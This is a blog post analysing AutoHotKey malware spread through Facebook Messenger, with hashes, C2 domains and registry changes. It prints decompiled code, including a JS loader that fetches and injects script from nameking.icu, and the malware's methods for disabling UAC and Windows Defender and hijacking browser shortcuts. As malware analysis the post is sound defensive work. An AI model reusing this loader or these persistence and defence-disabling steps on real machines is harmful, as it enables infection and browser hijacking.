Analyzing an AutoHotKey Malware

I found this malware spreading through the Facebook messenger. Thanks to Rashan Hasaranga for notifying me this in the first place. It was targeting Sri Lankan people on Facebook. It was a compressed “.bz” file which was spreading via the messenger. The name had “video_” and a random number.

After I downloaded the files, I checked the file hashes. I couldn’t find any analysis done before. So, I decided to get to the bottom of this. The malicious files have the extension as “.com” instead of an exe. However, it’s a compiled exe, renaming this to “com” will still run as an exe by the Windows loader.

These are the samples I found. However, they all contain the same malware. I found 2 authors compiled this from 2 different machines. Read along 😊

Analyzed Samples

Video_372473954.mp4.com

Video_201207204.mp4.com

Video_1675537051.mp4.com

Static Analysis

The file was being detected by 44 Antiviruses. So obviously it’s a malware or something dodgy.

The manifest file reveals that this is a compiled AutoHotKey file. Also, this malware requires administrative privileges to run. It will prompt to run as admin.

The decompiled source code be found in the Links section.

Behavior Graph

The malware will require admin privileges to run. On the first run, it will replicate itself inside the %appdata% folder of the system as “ServiceApp.exe”. In this case “C:\users\admin\AppData\Roaming” folder. Next, it will begin execution with “ServiceApp.exe -b” parameter to perform its malicious activity. It calls sc.exe to stop and remove the Windows Defender service. I will come to that in the Dynamic Analysis section with the source code.

Summary of IOCs

Main Object – Video_201207204.mp4.com

sha256 792153d5472e70034bdd46c0a9cac9a6eaad509492a37cc412db79ba37499ba9
sha1 937018d9646ea107e8e6944cbc44bf7176c6336c
md5 99e1e267724eb0b9b1bebce919d86275

Dropped Executables – Video_201207204.mp4.com

C:\Users\admin\AppData\Roaming\pZip.dll
sha256 - a2bab3879e3e86a936effa6687fe6bfa033f060a191f211687e605bbe9439c62

C:\Users\admin\AppData\Roaming\ServiceApp.exe
sha256 - 792153d5472e70034bdd46c0a9cac9a6eaad509492a37cc412db79ba37499ba9

Modified Files – ServiceApp.exe

The following events happen once the malware replicates and begins execution from the %appdata% folder as “ServiceApp.exe -b”.

C:\Program Files\Google\Update\1.3.33.23\GoogleUpdate.exe_
sha256 - bfbdd26604fc653e01976ef23c92cf7adb59f9e80f47350f1a72b7876bbed60a

C:\Program Files\Google\Update\GoogleUpdate.exe_
sha256 - bfbdd26604fc653e01976ef23c92cf7adb59f9e80f47350f1a72b7876bbed60a

C:\Program Files\Opera\updatechecker\opera_autoupdate.exe_
sha256: b6d8a3f1fb8d3f6a98c30f1874d76a2e2568004c7f7afca378462f7d46a8589b

C:\Users\Public\Desktop\Google Chrome.lnk 
sha256: a45ff0f1f0b35ffede272a2b644822a2aa8beadb6e46fc8827a803e6f00018e4

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
sha256: e0fdce84e433bd76ef9534d26af43d77237f3f42f8a2f38b6b6224953e5f89eb

C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
sha256: ae3d9337f34d014e8b2393320af4751271a0d6ab61c6206dccd6f7c939ee0fa5

C:\Users\admin\AppData\Roaming\ServiceApp.zip
sha256 - 46dfdf9edb2769546ccc7bec45b7ea18db23f5d40ade88b97366d1f9675e73e3

C:\Users\Public\Desktop\Opera.lnk
sha256: ac9d47a58e5b6d1c864f639ff88b95c2fda692f74c9e213a420fdbf2d281daf3

C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Opera12.15 1748.lnk
sha256: dfb7f10c89a56cc8c9f2109f93daba87eddf3431d59345acc3a3f2dc6a8b43b4

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk
sha256: 02e8b95e955d2f1617577a828ab64ced96a00e2baa7e3d0ce971a3cfe4d0879d

Registry Entries – ServiceApp.exe

The malware will create an autorun registry key as “Extension_Service” and will begin execution with the parameter “-b” from the %appdata% location.

Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Name:	Extension_Service
Value:	"C:\Users\admin\AppData\Roaming\ServiceApp.exe" -b

Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Name:	EnableLUA
Value:	0

Key:	HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gupdate
Name:	Start
Value:	4

Key:	HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gupdatem
Name:	Start
Value:	4

Key:	HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\GoogleChromeElevationService
Name:	Start
Value:	4

Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
Name:	DisableAntiSpyware
Value:	1

Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
Name:	DisableAntiSpyware
Value:	1

DNS requests

whizzup.icu	
nameking.icu	

HTTP/HTTPS requests

http://nameking.icu/service.php	
http://nameking.icu/ServiceApp.zip	

Dynamic Analysis

Once I decompiled the code, I realized this malware’s variable names were Turkish. Furthermore, when I checked the decompiler log, I found out the full path names of the %appdata% variables used while compiling the malware. This malware includes the “pZip.dll” DLL file embedded inside the malware and drops inside the %appdata% folder. Since the author has used “FileInstall” which will Include the specified file inside the compiled version of the script, therefore full path of the from the malware author’s machine will be stored since he has used %A_AppData% variable in AHK.

FileInstall, pZip.dll, %A_AppData%\pZip.dll

Full Paths Found

Video_201207204.mp4.com

0006926A -> CompiledPathName: c:\users\jennietaranto46521\downloads\aq\pZip.dll
0007496C -> CompiledPathName: C:\Users\JENNIE~1\AppData\Local\Temp\2\ahk5DD8.tmp

Video_1675537051.mp4.com

Video_372473954.mp4.com

0006A66D -> CompiledPathName: c:\users\fatih\onedrive\masaüstü\01.05.2019\pZip.dll
00075D6A -> CompiledPathName: C:\Users\fatih\AppData\Local\Temp\ahk4AF5.tmp

The source code is self-explanatory since it’s AHK. I’ll do a walkthrough of the malware briefly. In the beginning, we can see the variables declared and this malware has 3 hostnames,

liste = whizzup.icu|nameking.icu|kebapci.icu

The “whizzup.icu” host is no longer available. The other 2 hosts work. When one fails in that list, the malware tries the next host. I guess they are backup servers for the malware to contact.
If the malware is not compiled it will exit. It fetches the parameter as %1% and stores in param1. Next, it will call RunAsAdmin function to elevate privileges. It’s using “ShellExecuteA” Win32 API passing the “RunAs” verb to elevate privileges.

RunAsAdmin()
{
	if (!A_IsAdmin)
	{
		DllCall("shell32\ShellExecuteA", "uint", 0, "str", "RunAs", "str", A_ScriptFullPath, "str", "", "str", A_WorkingDir, "int", 1)
		ExitApp
	}
}

It checks if the parent process is either any of these process names “explorer.exe,chrome.exe,firefox.exe,iexplore.exe,opera.exe,browser.exe,WinRAR.exe,7zFM.exe” by using WinGet. If not, it will exit.
The FileInstall included the pZip.dll file as I have discussed earlier which revealed the author’s %appdata% variable.

This is the place where the malware will replicate as “ServiceApp.exe”. If the running directory is not equal to the %appdata% folder it will replicate itself. The variable “appdata_dosya_adi” is “ServiceApp.exe”. It will then begin execution with the parameter “-b”. If you just double click from the %appdata% directory it will exit if not the parameter is not passed.

At this point, the malware will begin writing entries in the registry. It will first create an autorun key “Extension_Service” in “Software\Microsoft\Windows\CurrentVersion\Run” to run the malware with the “-b” parameter.

It will disable the UAC by writing the value “0” to the “EnableLUA” key in “Software\Microsoft\Windows\CurrentVersion\Policies\System”.

It also disables the Windows Defender by setting “1” to the “DisableAntiSpyware” key located at “SOFTWARE\Policies\Microsoft\Windows Defender”

Next it will target Google Chrome’s update services and disable them by setting the “Start” key to “4” located at “SYSTEM\CurrentControlSet\services”

The updates services “gupdate” and “gupdatem” will be disabled along with the “GoogleChromeElevationService”. It’s also a service which will recover and repairs the Google Chrome updater.

Currently, the elevation service is only installed for Google Chrome builds. The primary use case at the moment for the service has to do with the Chrome recovery component. The recovery component is registered only for Google Chrome builds. It repairs the Chrome updater (Google Update) when the algorithm detects that Chrome is not being updated. Since Chrome could be installed per-system or per-user, an elevation service is needed to repair the code in the per-system install case.

https://chromium.googlesource.com/chromium/src/+/master/chrome/elevation_service/

After disabling the service, the malware will rename the “GoogleUpdate.exe” located inside the Program Files directory to “GoogleUpdate.exe_” so that it won’t be an executable anymore.
It will stop the Windows Defender and delete the service from the system.

The malware uses COM functions to access the internet and download the malicious plugin from the server. It will try each hostname in the “liste = whizzup.icu|nameking.icu|kebapci.icu” variable to download the file or update itself by the output from “Service.php”. It first fetches http://nameking.icu/service.php

Something I noticed is the server is configured to accept only requests containing “AHK_Request” as the User-Agent.

If I send a normal HTTP GET request it will return nothing.

If the server returns

##server_ok##|zip|http://nameking.icu/ServiceApp.zip  

The malware will first check for the string “##server_ok##”, if that’s available then it will begin to check for the string “zip” or “update” and call the respective functions. It will download the third string to the %appdata% folder. In this case, it will fetch http://nameking.icu/ServiceApp.zip.

If the string from the server returned contains “zip” file, the malware will unzip it using it’s “pZip.dll” file and delete the downloaded “ServiceApp.zip” file. If the string returned “update” will directly execute the new malware from the server.

For unzipping it’s using the “xZIP_ExtractFiles” API from the “pZip.dll.

By looking at the headers, we can determine it’s a zip file which is downloaded.

The zip file contains this 2 file which is the extension loaded to Chrome and Opera browsers.

After beautifying the JS script, here’s what it does in the Current version which is returned from the server.

fetch("http://nameking.icu/" + Math.random()).then(function(ajafaramomaju) {
    ajafaramomaju.ok && ajafaramomaju.blob().then(function(ajafaramomaju) {
        var itonefigufolijah = URL.createObjectURL(ajafaramomaju),
            epocogofida = document.createElement("script");
        epocogofida.src = itonefigufolijah, document.head.appendChild(epocogofida)
    })
});

The malware will start modifying all the shortcut files (.lnk) of Google Chrome and Opera on your machine to load this extension from the %appdata% folder.

It will write the “–enable-automation –disable-infobars –load-extension=” parameters to the shortcut files (.lnk) resulting in an output like this.

"C:\Program Files\Google\Chrome\Application\chrome.exe" --enable-automation --disable-infobars --load-extension="C:\Documents and Settings\haxor\Application Data\ServiceApp"

Once you run the infected Chrome using the current extension it will send a random request to nameking.icu host.

Other Links Found

I did some file brute forcing on this malicious server and found out the following links are valid. The same urls are valid on http://kebapci.icu host as well.

http://nameking.icu/ip.php
http://nameking.icu/configs.php
http://nameking.icu/server.php
http://nameking.icu/hd.php
http://nameking.icu/privacy.html
http://nameking.icu/video.php
http://nameking.icu/reg.php
http://nameking.icu/service.php
http://nameking.icu/cp.php
http://nameking.icu/pp.php

Summary

This malware is targeting the Google Chrome and Opera browsers and making them run a malicious extension downloaded by the malware. The malware will disable UAC and delete the Windows Defender service and disable all the Google Chrome update services to prevent updating of Chrome.
Since it has an update functionality and an autorun key, it constantly checks for updated extensions on each startup from its server and loads it to your browser by changing all the shortcut files (.lnk). If the server returns an “update” string, this will run whatever the server is hosting. They can change the malware anytime.

Links

Malware AHK Source Code
Network Traffic Capture

Advertisements

2 thoughts on “Analyzing an AutoHotKey Malware

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.